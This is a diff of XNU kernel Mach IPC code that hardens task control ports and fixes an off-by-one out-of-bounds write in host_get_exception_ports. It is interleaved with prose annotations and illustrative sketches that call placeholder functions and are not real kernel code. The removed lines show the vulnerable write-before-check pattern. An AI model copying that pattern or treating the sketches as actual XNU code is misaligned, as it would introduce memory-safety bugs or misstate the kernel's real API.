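                break;
        default:
                printf("hvg_hcall_trigger_dump failed: 0x%x\n", ret);
                break;
        }
}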
index 427bcee120ad880d65b016c0bd702bf1c420c5fe..33612c5f99160283436411b40b7e5541df418e1c 100644 (file)
@@ -302,11 +302,17 @@ convert_port_to_host_priv(
 {
        host_t host = HOST_NULL;
 
+       /* reject translation if itk_host is not host_priv */
+       if (port != current_task()->itk_host) {
+               return HOST_NULL;
+       }
+
        if (IP_VALID(port)) {
                ip_lock(port);
                if (ip_active(port) &&
                    (ip_kotype(port) == IKOT_HOST_PRIV)) {
-                       host = (host_t) ip_get_kobject(port);
+                       assert(ip_get_kobject(port) == &realhost);
+                       host = &realhost;
                }
                ip_unlock(port);
        }
@@ -602,8 +608,6 @@ host_set_exception_ports(
        }
 #endif
 
-       assert(host_priv == &realhost);
-
        host_lock(host_priv);
 
        for (i = FIRST_EXCEPTION; i < EXC_TYPES_COUNT; i++) {
@@ -696,8 +700,6 @@ host_get_exception_ports(
                return KERN_INVALID_ARGUMENT;
        }
 
-       assert(host_priv == &realhost);
-
        host_lock(host_priv);
 
        count = 0;
@@ -716,16 +718,13 @@ host_get_exception_ports(
                                        break;
                                }
                        }/* for */
-                       if (j == count) {
+                       if (j == count && count < *CountCnt) {
                                masks[j] = (1 << i);
                                ports[j] =
                                    ipc_port_copy_send(host_priv->exc_actions[i].port);
                                behaviors[j] = host_priv->exc_actions[i].behavior;
                                flavors[j] = host_priv->exc_actions[i].flavor;
                                count++;
-                               if (count > *CountCnt) {
-                                       break;
-                               }
                        }
                }
        }/* for */
index 9a3e468b281b00a4cfb2d3e0773295ecf8bdc4b3..dc196835adba23a969238a35914614c12bb4cc6a 100644 (file)
 #include <device/device_types.h>
 #include <device/device_server.h>
 
+#if     CONFIG_USER_NOTIFICATION
 #include <UserNotification/UNDReplyServer.h>
+#endif
 
 #if     CONFIG_ARCADE
 #include <mach/arcade_register_server.h>
 #include <uk_xkern/xk_uproxy_server.h>
 #endif  /* XK_PROXY */
 
+#include <kern/counter.h>
 #include <kern/ipc_tt.h>
 #include <kern/ipc_mig.h>
 #include <kern/ipc_misc.h>
 #include <ipc/ipc_port.h>
 #include <ipc/ipc_voucher.h>
 #include <kern/sync_sema.h>
-#include <kern/counters.h>
 #include <kern/work_interval.h>
 #include <kern/suid_cred.h>
+#include <kern/task_ident.h>
 
 #if HYPERVISOR
 #include <kern/hv_support.h>
@@ -174,9 +177,6 @@ typedef struct {
        mig_routine_t routine;
        int size;
        int kobjidx;
-#if     MACH_COUNTERS
-       mach_counter_t callcount;
-#endif
 } mig_hash_t;
 
 #define MAX_MIG_ENTRIES 1031
@@ -213,7 +213,9 @@ static const struct mig_subsystem *mig_e[] = {
 #ifdef VM32_SUPPORT
        (const struct mig_subsystem *)&vm32_map_subsystem,
 #endif
+#if CONFIG_USER_NOTIFICATION
        (const struct mig_subsystem *)&UNDReply_subsystem,
+#endif
        (const struct mig_subsystem *)&mach_voucher_subsystem,
        (const struct mig_subsystem *)&mach_voucher_attr_control_subsystem,
        (const struct mig_subsystem *)&memory_entry_subsystem,
@@ -301,10 +303,6 @@ find_mig_hash_entry(int msgh_id)
 
        if (!ptr->routine || msgh_id != ptr->num) {
                ptr = (mig_hash_t *)0;
-       } else {
-#if     MACH_COUNTERS
-               ptr->callcount++;
-#endif
        }
 
        return ptr;
@@ -724,6 +722,9 @@ ipc_kobject_init_port(
        if (options & IPC_KOBJECT_ALLOC_IMMOVABLE_SEND) {
                port->ip_immovable_send = 1;
        }
+       if (options & IPC_KOBJECT_ALLOC_PINNED) {
+               port->ip_pinned = 1;
+       }
 }
 
 /*
@@ -791,6 +792,42 @@ ipc_kobject_alloc_labeled_port(
        return port;
 }
 
+static void
+ipc_kobject_subst_once_notify(mach_msg_header_t *msg)
+{
+       mach_no_senders_notification_t *notification = (void *)msg;
+       ipc_port_t port = notification->not_header.msgh_remote_port;
+
+       require_ip_active(port);
+       assert(IKOT_PORT_SUBST_ONCE == ip_kotype(port));
+
+       ip_release((ipc_port_t)ip_get_kobject(port));
+       ipc_port_dealloc_kernel(port);
+}
+
+/*
+ *     Routine:        ipc_kobject_alloc_subst_once
+ *     Purpose:
+ *             Make a port that will be substituted by the kolabel
+ *             rules once, preventing the next substitution (of its target)
+ *             from happening, if any.
+ *
+ *     Returns:
+ *             A port with a send right, that will substitute to its "kobject".
+ *
+ *     Conditions:
+ *             No locks held (memory is allocated)
+ *             `target` has a refcount that this function consumes
+ */
+ipc_port_t
+ipc_kobject_alloc_subst_once(
+       ipc_port_t                  target)
+{
+       return ipc_kobject_alloc_labeled_port(target,
+                  IKOT_PORT_SUBST_ONCE, IPC_LABEL_SUBST_ONCE,
+                  IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST);
+}
+
 /*
  *     Routine:        ipc_kobject_make_send_lazy_alloc_port
  *     Purpose:
@@ -820,6 +857,7 @@ ipc_kobject_make_send_lazy_alloc_port(
        ipc_port_t              *port_store,
        ipc_kobject_t           kobject,
        ipc_kobject_type_t      type,
+       ipc_kobject_alloc_options_t alloc_opts,
        boolean_t               __ptrauth_only should_ptrauth,
        uint64_t                __ptrauth_only ptrauth_discriminator)
 {
@@ -839,7 +877,7 @@ ipc_kobject_make_send_lazy_alloc_port(
 
        if (!IP_VALID(port)) {
                port = ipc_kobject_alloc_port(kobject, type,
-                   IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST);
+                   IPC_KOBJECT_ALLOC_MAKE_SEND | IPC_KOBJECT_ALLOC_NSREQUEST | alloc_opts);
 
 #if __has_feature(ptrauth_calls)
                if (should_ptrauth) {
@@ -1009,40 +1047,150 @@ ipc_kobject_destroy(
 }
 
 /*
- *     Routine:         ipc_kobject_label_check
+ *     Routine:        ipc_kobject_label_substitute_task
+ *     Purpose:
+ *             Substitute a task control port for its immovable
+ *             equivalent when the receiver is that task.
+ *     Conditions:
+ *             Space is write locked and active.
+ *             Port is locked and active.
+ *     Returns:
+ *             - IP_NULL port if no substitution is to be done
+ *             - a valid port if a substitution needs to happen
+ */
+static ipc_port_t
+ipc_kobject_label_substitute_task(
+       ipc_space_t             space,
+       ipc_port_t              port)
+{
+       ipc_port_t subst = IP_NULL;
+       task_t task = ipc_kobject_get(port);
+
+       if (task != TASK_NULL && task == space->is_task) {
+               if ((subst = port->ip_alt_port)) {
+                       return subst;
+               }
+       }
+
+       return IP_NULL;
+}
+
+/*
+ *     Routine:        ipc_kobject_label_substitute_thread
+ *     Purpose:
+ *             Substitute a thread control port for its immovable
+ *             equivalent when it belongs to the receiver task.
+ *     Conditions:
+ *             Space is write locked and active.
+ *             Port is locked and active.
+ *     Returns:
+ *             - IP_NULL port if no substitution is to be done
+ *             - a valid port if a substitution needs to happen
+ */
+static ipc_port_t
+ipc_kobject_label_substitute_thread(
+       ipc_space_t             space,
+       ipc_port_t              port)
+{
+       ipc_port_t subst = IP_NULL;
+       thread_t thread = ipc_kobject_get(port);
+
+       if (thread != THREAD_NULL && space->is_task == thread->task) {
+               if ((subst = port->ip_alt_port) != IP_NULL) {
+                       return subst;
+               }
+       }
+
+       return IP_NULL;
+}
+
+/*
+ *     Routine:        ipc_kobject_label_check
  *     Purpose:
- *             Check to see if the space is allowed to possess a
- *      right for the given port. In order to qualify, the
- *      space label must contain all the privileges listed
- *      in the port/kobject label.
+ *             Check to see if the space is allowed to possess
+ *             a right for the given port. In order to qualify,
+ *             the space label must contain all the privileges
+ *             listed in the port/kobject label.
  *
  *     Conditions:
  *             Space is write locked and active.
- *      Port is locked and active.
+ *             Port is locked and active.
+ *
+ *     Returns:
+ *             Whether the copyout is authorized.
+ *
+ *             If a port substitution is requested, the space is unlocked,
+ *             the port is unlocked and its "right" consumed.
+ *
+ *             As of now, substituted ports only happen for send rights.
  */
-boolean_t
+bool
 ipc_kobject_label_check(
-       ipc_space_t                   space,
-       ipc_port_t                    port,
-       __unused mach_msg_type_name_t msgt_name)
+       ipc_space_t                     space,
+       ipc_port_t                      port,
+       mach_msg_type_name_t            msgt_name,
+       ipc_object_copyout_flags_t     *flags,
+       ipc_port_t                     *subst_portp)
 {
        ipc_kobject_label_t labelp;
+       ipc_label_t label;
 
        assert(is_active(space));
        assert(ip_active(port));
 
+       *subst_portp = IP_NULL;
+
        /* Unlabled ports/kobjects are always allowed */
        if (!ip_is_kolabeled(port)) {
-               return TRUE;
+               return true;
        }
 
        /* Never OK to copyout the receive right for a labeled kobject */
        if (msgt_name == MACH_MSG_TYPE_PORT_RECEIVE) {
-               panic("ipc_kobject_label_check: attempted receive right copyout for labeled kobject");
+               panic("ipc_kobject_label_check: attempted receive right "
+                   "copyout for labeled kobject");
        }
 
        labelp = port->ip_kolabel;
-       return (labelp->ikol_label & space->is_label) == labelp->ikol_label;
+       label = labelp->ikol_label;
+
+       if ((*flags & IPC_OBJECT_COPYOUT_FLAGS_NO_LABEL_CHECK) == 0 &&
+           (label & IPC_LABEL_SUBST_MASK)) {
+               ipc_port_t subst = IP_NULL;
+
+               if (msgt_name != MACH_MSG_TYPE_PORT_SEND) {
+                       return false;
+               }
+
+               switch (label & IPC_LABEL_SUBST_MASK) {
+               case IPC_LABEL_SUBST_TASK:
+                       subst = ipc_kobject_label_substitute_task(space, port);
+                       break;
+               case IPC_LABEL_SUBST_THREAD:
+                       subst = ipc_kobject_label_substitute_thread(space, port);
+                       break;
+               case IPC_LABEL_SUBST_ONCE:
+                       /* the next check will _not_ substitute */
+                       *flags |= IPC_OBJECT_COPYOUT_FLAGS_NO_LABEL_CHECK;
+                       subst = ip_get_kobject(port);
+                       break;
+               default:
+                       panic("unexpected label: %llx\n", label);
+               }
+
+               if (subst != IP_NULL) {
+                       ip_reference(subst);
+                       is_write_unlock(space);
+                       ipc_port_release_send_and_unlock(port);
+                       port = ipc_port_make_send(subst);
+                       ip_release(subst);
+                       *subst_portp = port;
+                       return true;
+               }
+       }
+
+       return (label & space->is_label & IPC_LABEL_SPACE_MASK) ==
+              (label & IPC_LABEL_SPACE_MASK);
 }
 
 boolean_t
@@ -1083,6 +1231,10 @@ ipc_kobject_notify(
                        ipc_voucher_attr_control_notify(request_header);
                        return TRUE;
 
+               case IKOT_PORT_SUBST_ONCE:
+                       ipc_kobject_subst_once_notify(request_header);
+                       return TRUE;
+
                case IKOT_SEMAPHORE:
                        semaphore_notify(request_header);
                        return TRUE;
@@ -1139,6 +1291,9 @@ ipc_kobject_notify(
                case IKOT_SUID_CRED:
                        suid_cred_notify(request_header);
                        return TRUE;
+               case IKOT_TASK_ID_TOKEN:
+                       task_id_token_notify(request_header);
+                       return TRUE;
 #if HYPERVISOR
                case IKOT_HYPERVISOR:
                        hv_port_notify(request_header);
index 02614a531ca8bc018ddad8cedb834097ba43edc2..62c55cc9a816164096e32808f80c5abc9b440fbe 100644 (file)
@@ -98,7 +98,7 @@ typedef natural_t       ipc_kobject_type_t;
 #define IKOT_PSET                       6
 #define IKOT_PSET_NAME                  7
 #define IKOT_TIMER                      8
-#define IKOT_PAGING_REQUEST             9
+#define IKOT_PORT_SUBST_ONCE            9
 #define IKOT_MIG                        10
 #define IKOT_MEMORY_OBJECT              11
 #define IKOT_XMM_PAGER                  12
@@ -139,12 +139,13 @@ typedef natural_t       ipc_kobject_type_t;
 #define IKOT_THREAD_READ                47
 #define IKOT_SUID_CRED                  48
 #define IKOT_HYPERVISOR                 49
+#define IKOT_TASK_ID_TOKEN              50
 
 /*
  * Add new entries here and adjust IKOT_UNKNOWN.
  * Please keep ipc/ipc_object.c:ikot_print_array up to date.
  */
-#define IKOT_UNKNOWN                    50      /* magic catchall       */
+#define IKOT_UNKNOWN                    51      /* magic catchall */
 #define IKOT_MAX_TYPE   (IKOT_UNKNOWN+1)        /* # of IKOT_ types    */
 
 /* set the bitstring index for kobject */
@@ -191,6 +192,8 @@ __options_decl(ipc_kobject_alloc_options_t, uint32_t, {
        IPC_KOBJECT_ALLOC_IMMOVABLE_SEND = 0x00000008,
        /* Add a label structure to the port */
        IPC_KOBJECT_ALLOC_LABEL = 0x00000010,
+       /* Make all rights pinned (non dealloc-able) in an ipc space*/
+       IPC_KOBJECT_ALLOC_PINNED    = 0x00000020,
 });
 
 /* Allocates a kobject port, never fails */
@@ -206,11 +209,15 @@ extern ipc_port_t ipc_kobject_alloc_labeled_port(
        ipc_label_t                 label,
        ipc_kobject_alloc_options_t options);
 
+extern ipc_port_t ipc_kobject_alloc_subst_once(
+       ipc_port_t                  target);
+
 /* Makes a send right, lazily allocating a kobject port, arming for no-senders, never fails */
 extern boolean_t ipc_kobject_make_send_lazy_alloc_port(
        ipc_port_t                 *port_store,
        ipc_kobject_t               kobject,
        ipc_kobject_type_t          type,
+       ipc_kobject_alloc_options_t alloc_opts,
        boolean_t                   should_ptrauth,
        uint64_t                    ptrauth_discriminator) __result_use_check;
 
@@ -235,10 +242,28 @@ ipc_kobject_get(ipc_port_t port)
 }
 
 /* Check if a kobject can be copied out to a given space */
-extern boolean_t ipc_kobject_label_check(
-       ipc_space_t space,
-       ipc_port_t port,
-       mach_msg_type_name_t msgt_name);
+extern bool     ipc_kobject_label_check(
+       ipc_space_t                 space,
+       ipc_port_t                  port,
+       mach_msg_type_name_t        msgt_name,
+       ipc_object_copyout_flags_t *flags,
+       ipc_port_t                 *subst_portp) __result_use_check;
+
+__result_use_check
+static inline bool
+ip_label_check(
+       ipc_space_t                 space,
+       ipc_port_t                  port,
+       mach_msg_type_name_t        msgt_name,
+       ipc_object_copyout_flags_t *flags,
+       ipc_port_t                 *subst_portp)
+{
+       if (!ip_is_kolabeled(port)) {
+               *subst_portp = IP_NULL;
+               return true;
+       }
+       return ipc_kobject_label_check(space, port, msgt_name, flags, subst_portp);
+}
 
 /* Release any kernel object resources associated with a port */
 extern void ipc_kobject_destroy(
@@ -249,6 +274,21 @@ extern void ipc_kobject_destroy(
 extern kern_return_t
 uext_server(ipc_kmsg_t request, ipc_kmsg_t * reply);
 
+/* These boot-args decide if the pinned and immovable ports can be copied out to IPC space */
+__options_decl(ipc_control_port_options_t, uint32_t, {
+       IPC_CONTROL_PORT_OPTIONS_NONE           = 0x00,
+
+       IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT    = 0x01,
+       IPC_CONTROL_PORT_OPTIONS_PINNED_HARD    = 0x02,
+
+       IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_SOFT = 0x10,
+       IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD = 0x20,
+});
+
+extern ipc_control_port_options_t ipc_control_port_options;
+extern bool pinned_control_port_enabled;
+extern bool immovable_control_port_enabled;
+
 #endif /* MACH_KERNEL_PRIVATE */
 
 #endif /* KERNEL_PRIVATE */
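The copyout path (not part of this diff) is presumably the consumer of ip_label_check(): it calls in with the space write-locked and the port locked, and when a substitution happens both locks have been dropped, the original right consumed, and a fresh send right on the substituted port handed back through subst_portp. A hedged sketch of that calling convention; retry_with() and do_copyout() stand in for the real ipc_object_copyout() logic, and IPC_OBJECT_COPYOUT_FLAGS_NONE is an assumed name:

/* Placeholders for the surrounding copyout logic (illustrative only). */
extern kern_return_t retry_with(ipc_space_t space, ipc_port_t subst,
    mach_msg_type_name_t msgt_name, ipc_object_copyout_flags_t flags);
extern kern_return_t do_copyout(ipc_space_t space, ipc_port_t port,
    mach_msg_type_name_t msgt_name);

static kern_return_t
copyout_with_label_check(ipc_space_t space, ipc_port_t port,
    mach_msg_type_name_t msgt_name)
{
        ipc_object_copyout_flags_t flags = IPC_OBJECT_COPYOUT_FLAGS_NONE;  /* assumed name */
        ipc_port_t subst = IP_NULL;

        /* space is write locked, port is locked and active at this point */
        if (!ip_label_check(space, port, msgt_name, &flags, &subst)) {
                return KERN_INVALID_CAPABILITY;         /* label not allowed in this space */
        }
        if (subst != IP_NULL) {
                /* Both locks were dropped and the original right consumed;
                 * restart the copyout with the substituted send right. */
                return retry_with(space, subst, MACH_MSG_TYPE_PORT_SEND, flags);
        }
        return do_copyout(space, port, msgt_name);
}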
index d47764b905d2917fd05aee960782ef7fc36521e5..c1c99b9328f0a0e9718d0764c8e32b65912e4f06 100644 (file)
@@ -347,7 +347,7 @@ mach_msg_rpc_from_kernel(
        mach_msg_size_t         send_size,
        mach_msg_size_t         rcv_size)
 {
-       return kernel_mach_msg_rpc(msg, send_size, rcv_size, TRUE, NULL);
+       return kernel_mach_msg_rpc(msg, send_size, rcv_size, TRUE, TRUE, NULL);
 }
 #endif /* IKM_SUPPORT_LEGACY */
 
@@ -357,7 +357,7 @@ mach_msg_rpc_from_kernel_proper(
        mach_msg_size_t         send_size,
        mach_msg_size_t         rcv_size)
 {
-       return kernel_mach_msg_rpc(msg, send_size, rcv_size, FALSE, NULL);
+       return kernel_mach_msg_rpc(msg, send_size, rcv_size, FALSE, TRUE, NULL);
 }
 
 mach_msg_return_t
@@ -369,6 +369,7 @@ kernel_mach_msg_rpc(
        __unused
 #endif
        boolean_t           legacy,
+       boolean_t           interruptible,
        boolean_t           *message_moved)
 {
        thread_t self = current_thread();
@@ -449,7 +450,7 @@ kernel_mach_msg_rpc(
                require_ip_active(reply);
 
                /* JMM - why this check? */
-               if (!self->active && !self->inspection) {
+               if (interruptible && !self->active && !self->inspection) {
                        ipc_port_dealloc_reply(reply);
                        self->ith_rpc_reply = IP_NULL;
                        return MACH_RCV_INTERRUPTED;
@@ -462,7 +463,7 @@ kernel_mach_msg_rpc(
                    MACH_MSG_OPTION_NONE,
                    MACH_MSG_SIZE_MAX,
                    MACH_MSG_TIMEOUT_NONE,
-                   THREAD_INTERRUPTIBLE);
+                   interruptible ? THREAD_INTERRUPTIBLE : THREAD_UNINT);
 
                mr = self->ith_state;
                kmsg = self->ith_kmsg;
@@ -475,7 +476,7 @@ kernel_mach_msg_rpc(
                }
 
                assert(mr == MACH_RCV_INTERRUPTED);
-
+               assert(interruptible);
                assert(reply == self->ith_rpc_reply);
 
                if (self->ast & AST_APC) {
@@ -1036,7 +1037,7 @@ convert_mig_object_to_port(
         * if this is the first send right
         */
        if (!ipc_kobject_make_send_lazy_alloc_port(&mig_object->port,
-           (ipc_kobject_t) mig_object, IKOT_MIG, false, 0)) {
+           (ipc_kobject_t) mig_object, IKOT_MIG, IPC_KOBJECT_ALLOC_NONE, false, 0)) {
                mig_object_deallocate(mig_object);
        }
 
index 48abc259163605ac87dd23462fa6a87ac2bd8c37..cbb2f2aa330b64def8e9207bd4a475fd0f00a5ab 100644 (file)
@@ -161,6 +161,7 @@ mach_msg_return_t kernel_mach_msg_rpc(
        mach_msg_size_t                     send_size,
        mach_msg_size_t                     rcv_size,
        boolean_t                           legacy,
+       boolean_t                           interruptible,
        boolean_t                           *message_moved);
 #endif /* XNU_KERNEL_PRIVATE */
 
index aaec28a5d4bd71b835a908f84ff61d0461085519..6e7638f5e5d7bf9c2f0aee2e87f74d6393992ddb 100644 (file)
@@ -156,7 +156,7 @@ fileport_invoke(task_t task, mach_port_name_t name,
 
        kr = ipc_object_copyin(task->itk_space, name,
            MACH_MSG_TYPE_COPY_SEND, (ipc_object_t *)&fileport, 0, NULL,
-           IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND);
+           IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
        if (kr != KERN_SUCCESS) {
                return kr;
        }
index 643c38fbb582f8bdbec3d7b84caba71a3d0cb08b..34bff56069832306f807609bc9adaa1aa968c1e0 100644 (file)
@@ -140,7 +140,7 @@ convert_semaphore_to_port(semaphore_t semaphore)
         * semaphore_notify if this is the first send right
         */
        if (!ipc_kobject_make_send_lazy_alloc_port(&semaphore->port,
-           (ipc_kobject_t) semaphore, IKOT_SEMAPHORE, false, 0)) {
+           (ipc_kobject_t) semaphore, IKOT_SEMAPHORE, IPC_KOBJECT_ALLOC_NONE, false, 0)) {
                semaphore_dereference(semaphore);
        }
        return semaphore->port;
index 7a7d3b783ea1b5b998efcc19e5408c7150e7c21b..f02ed471a03c6c83d2db19e416cfc05327e2bcff 100644 (file)
@@ -91,6 +91,7 @@
 #include <kern/kalloc.h>
 #include <kern/thread.h>
 #include <kern/misc_protos.h>
+#include <kdp/kdp_dyld.h>
 
 #include <vm/vm_map.h>
 #include <vm/vm_pageout.h>
@@ -109,21 +110,18 @@ extern int cs_relax_platform_task_ports;
 extern boolean_t IOTaskHasEntitlement(task_t, const char *);
 
 /* forward declarations */
-task_t convert_port_to_locked_task(ipc_port_t port, boolean_t eval);
-task_inspect_t convert_port_to_locked_task_inspect(ipc_port_t port);
-task_read_t convert_port_to_locked_task_read(ipc_port_t port);
-static task_read_t convert_port_to_task_read_locked(ipc_port_t port);
 static kern_return_t port_allowed_with_task_flavor(int which, mach_task_flavor_t flavor);
 static kern_return_t port_allowed_with_thread_flavor(int which, mach_thread_flavor_t flavor);
-static task_inspect_t convert_port_to_task_inspect_locked(ipc_port_t port);
 static void ipc_port_bind_special_reply_port_locked(ipc_port_t port);
 static kern_return_t ipc_port_unbind_special_reply_port(thread_t thread, boolean_t unbind_active_port);
 kern_return_t task_conversion_eval(task_t caller, task_t victim);
 static ipc_space_t convert_port_to_space_no_eval(ipc_port_t port);
-static task_t convert_port_to_task_no_eval(ipc_port_t port);
 static thread_t convert_port_to_thread_no_eval(ipc_port_t port);
 static ipc_port_t convert_task_to_port_with_flavor(task_t task, mach_task_flavor_t flavor);
 static ipc_port_t convert_thread_to_port_with_flavor(thread_t thread, mach_thread_flavor_t flavor);
+static task_read_t convert_port_to_task_read_no_eval(ipc_port_t port);
+static thread_read_t convert_port_to_thread_read_no_eval(ipc_port_t port);
+static ipc_space_read_t convert_port_to_space_read_no_eval(ipc_port_t port);
 
 /*
  *     Routine:        ipc_task_init
@@ -144,7 +142,7 @@ ipc_task_init(
        ipc_space_t space;
        ipc_port_t kport;
        ipc_port_t nport;
-
+       ipc_port_t pport;
        kern_return_t kr;
        int i;
 
@@ -156,10 +154,21 @@ ipc_task_init(
 
        space->is_task = task;
 
-       kport = ipc_port_alloc_kernel();
+       if (immovable_control_port_enabled) {
+               ipc_kobject_alloc_options_t options = IPC_KOBJECT_ALLOC_IMMOVABLE_SEND;
+               if (pinned_control_port_enabled) {
+                       options |= IPC_KOBJECT_ALLOC_PINNED;
+               }
+               pport = ipc_kobject_alloc_port(IKO_NULL, IKOT_NONE, options);
 
-       if (kport == IP_NULL) {
-               panic("ipc_task_init");
+               kport = ipc_kobject_alloc_labeled_port(IKO_NULL, IKOT_TASK_CONTROL,
+                   IPC_LABEL_SUBST_TASK, IPC_KOBJECT_ALLOC_NONE);
+               kport->ip_alt_port = pport;
+       } else {
+               kport = ipc_kobject_alloc_port(IKO_NULL, IKOT_TASK_CONTROL,
+                   IPC_KOBJECT_ALLOC_NONE);
+
+               pport = kport;
        }
 
        nport = ipc_port_alloc_kernel();
@@ -167,15 +176,21 @@ ipc_task_init(
                panic("ipc_task_init");
        }
 
+       if (pport == IP_NULL) {
+               panic("ipc_task_init");
+       }
+
        itk_lock_init(task);
-       task->itk_self[TASK_FLAVOR_CONTROL] = kport;
-       task->itk_self[TASK_FLAVOR_NAME] = nport;
+       task->itk_task_ports[TASK_FLAVOR_CONTROL] = kport;
+       task->itk_task_ports[TASK_FLAVOR_NAME] = nport;
 
        /* Lazily allocated on-demand */
-       task->itk_self[TASK_FLAVOR_INSPECT] = IP_NULL;
-       task->itk_self[TASK_FLAVOR_READ] = IP_NULL;
-       task->itk_resume = IP_NULL;
+       task->itk_task_ports[TASK_FLAVOR_INSPECT] = IP_NULL;
+       task->itk_task_ports[TASK_FLAVOR_READ] = IP_NULL;
+       task->itk_dyld_notify = NULL;
 
+       task->itk_self = pport;
+       task->itk_resume = IP_NULL; /* Lazily allocated on-demand */
        if (task_is_a_corpse_fork(task)) {
                /*
                 * No sender's notification for corpse would not
@@ -221,7 +236,7 @@ ipc_task_init(
                }
        } else {
                itk_lock(parent);
-               assert(parent->itk_self[TASK_FLAVOR_CONTROL] != IP_NULL);
+               assert(parent->itk_task_ports[TASK_FLAVOR_CONTROL] != IP_NULL);
 
                /* inherit registered ports */
 
@@ -280,24 +295,33 @@ ipc_task_enable(
        ipc_port_t nport;
        ipc_port_t iport;
        ipc_port_t rdport;
+       ipc_port_t pport;
 
        itk_lock(task);
-       kport = task->itk_self[TASK_FLAVOR_CONTROL];
+
+       assert(!task->ipc_active || task_is_a_corpse(task));
+       task->ipc_active = true;
+
+       kport = task->itk_task_ports[TASK_FLAVOR_CONTROL];
        if (kport != IP_NULL) {
                ipc_kobject_set(kport, (ipc_kobject_t) task, IKOT_TASK_CONTROL);
        }
-       nport = task->itk_self[TASK_FLAVOR_NAME];
+       nport = task->itk_task_ports[TASK_FLAVOR_NAME];
        if (nport != IP_NULL) {
                ipc_kobject_set(nport, (ipc_kobject_t) task, IKOT_TASK_NAME);
        }
-       iport = task->itk_self[TASK_FLAVOR_INSPECT];
+       iport = task->itk_task_ports[TASK_FLAVOR_INSPECT];
        if (iport != IP_NULL) {
                ipc_kobject_set(iport, (ipc_kobject_t) task, IKOT_TASK_INSPECT);
        }
-       rdport = task->itk_self[TASK_FLAVOR_READ];
+       rdport = task->itk_task_ports[TASK_FLAVOR_READ];
        if (rdport != IP_NULL) {
                ipc_kobject_set(rdport, (ipc_kobject_t) task, IKOT_TASK_READ);
        }
+       pport = task->itk_self;
+       if (immovable_control_port_enabled && pport != IP_NULL) {
+               ipc_kobject_set(pport, (ipc_kobject_t) task, IKOT_TASK_CONTROL);
+       }
 
        itk_unlock(task);
 }
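With immovable control ports enabled, a task now has two control ports: the movable kport, labelled IPC_LABEL_SUBST_TASK and published through itk_task_ports[TASK_FLAVOR_CONTROL], and the immovable (optionally pinned) pport stored in itk_self and reachable via kport->ip_alt_port. Combined with the substitution logic added in ipc_kobject.c, the owning task only ever receives the immovable port. A hedged summary of that topology; the helper below is illustrative, not kernel code, and ignores locking:

static ipc_port_t
task_control_port_for_copyout(task_t task, ipc_space_t space)
{
        ipc_port_t kport = task->itk_task_ports[TASK_FLAVOR_CONTROL];

        /* ipc_kobject_label_substitute_task() applies this rule at copyout:
         * the owning task gets the immovable alternate port. */
        if (space->is_task == task && kport->ip_alt_port != IP_NULL) {
                return kport->ip_alt_port;      /* == task->itk_self */
        }
        return kport;
}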
@@ -319,24 +343,45 @@ ipc_task_disable(
        ipc_port_t iport;
        ipc_port_t rdport;
        ipc_port_t rport;
+       ipc_port_t pport;
 
        itk_lock(task);
-       kport = task->itk_self[TASK_FLAVOR_CONTROL];
+
+       /*
+        * This innocuous looking line is load bearing.
+        *
+        * It is used to disable the creation of lazy made ports.
+        * We must do so before we drop the last reference on the task,
+        * as task ports do not own a reference on the task, and
+        * convert_port_to_task* will crash trying to resurrect a task.
+        */
+       task->ipc_active = false;
+
+       kport = task->itk_task_ports[TASK_FLAVOR_CONTROL];
        if (kport != IP_NULL) {
-               ipc_kobject_set(kport, IKO_NULL, IKOT_NONE);
+               ip_lock(kport);
+               kport->ip_alt_port = IP_NULL;
+               ipc_kobject_set_atomically(kport, IKO_NULL, IKOT_NONE);
+               ip_unlock(kport);
        }
-       nport = task->itk_self[TASK_FLAVOR_NAME];
+       nport = task->itk_task_ports[TASK_FLAVOR_NAME];
        if (nport != IP_NULL) {
                ipc_kobject_set(nport, IKO_NULL, IKOT_NONE);
        }
-       iport = task->itk_self[TASK_FLAVOR_INSPECT];
+       iport = task->itk_task_ports[TASK_FLAVOR_INSPECT];
        if (iport != IP_NULL) {
                ipc_kobject_set(iport, IKO_NULL, IKOT_NONE);
        }
-       rdport = task->itk_self[TASK_FLAVOR_READ];
+       rdport = task->itk_task_ports[TASK_FLAVOR_READ];
        if (rdport != IP_NULL) {
                ipc_kobject_set(rdport, IKO_NULL, IKOT_NONE);
        }
+       pport = task->itk_self;
+       if (pport != kport && pport != IP_NULL) {
+               assert(immovable_control_port_enabled);
+               assert(pport->ip_immovable_send);
+               ipc_kobject_set(pport, IKO_NULL, IKOT_NONE);
+       }
 
        rport = task->itk_resume;
        if (rport != IP_NULL) {
@@ -375,27 +420,51 @@ ipc_task_terminate(
        ipc_port_t iport;
        ipc_port_t rdport;
        ipc_port_t rport;
-       int i;
+       ipc_port_t pport;
+       ipc_port_t sself;
+       ipc_port_t *notifiers_ptr = NULL;
 
        itk_lock(task);
-       kport = task->itk_self[TASK_FLAVOR_CONTROL];
+
+       /*
+        * If we ever failed to clear ipc_active before the last reference
+        * was dropped, lazy ports might be made and used after the last
+        * reference is dropped and cause use after free (see comment in
+        * ipc_task_disable()).
+        */
+       assert(!task->ipc_active);
+
+       kport = task->itk_task_ports[TASK_FLAVOR_CONTROL];
+       sself = task->itk_settable_self;
 
        if (kport == IP_NULL) {
                /* the task is already terminated (can this happen?) */
                itk_unlock(task);
                return;
        }
-       task->itk_self[TASK_FLAVOR_CONTROL] = IP_NULL;
+       task->itk_task_ports[TASK_FLAVOR_CONTROL] = IP_NULL;
 
-       rdport = task->itk_self[TASK_FLAVOR_READ];
-       task->itk_self[TASK_FLAVOR_READ] = IP_NULL;
+       rdport = task->itk_task_ports[TASK_FLAVOR_READ];
+       task->itk_task_ports[TASK_FLAVOR_READ] = IP_NULL;
 
-       iport = task->itk_self[TASK_FLAVOR_INSPECT];
-       task->itk_self[TASK_FLAVOR_INSPECT] = IP_NULL;
+       iport = task->itk_task_ports[TASK_FLAVOR_INSPECT];
+       task->itk_task_ports[TASK_FLAVOR_INSPECT] = IP_NULL;
 
-       nport = task->itk_self[TASK_FLAVOR_NAME];
+       nport = task->itk_task_ports[TASK_FLAVOR_NAME];
        assert(nport != IP_NULL);
-       task->itk_self[TASK_FLAVOR_NAME] = IP_NULL;
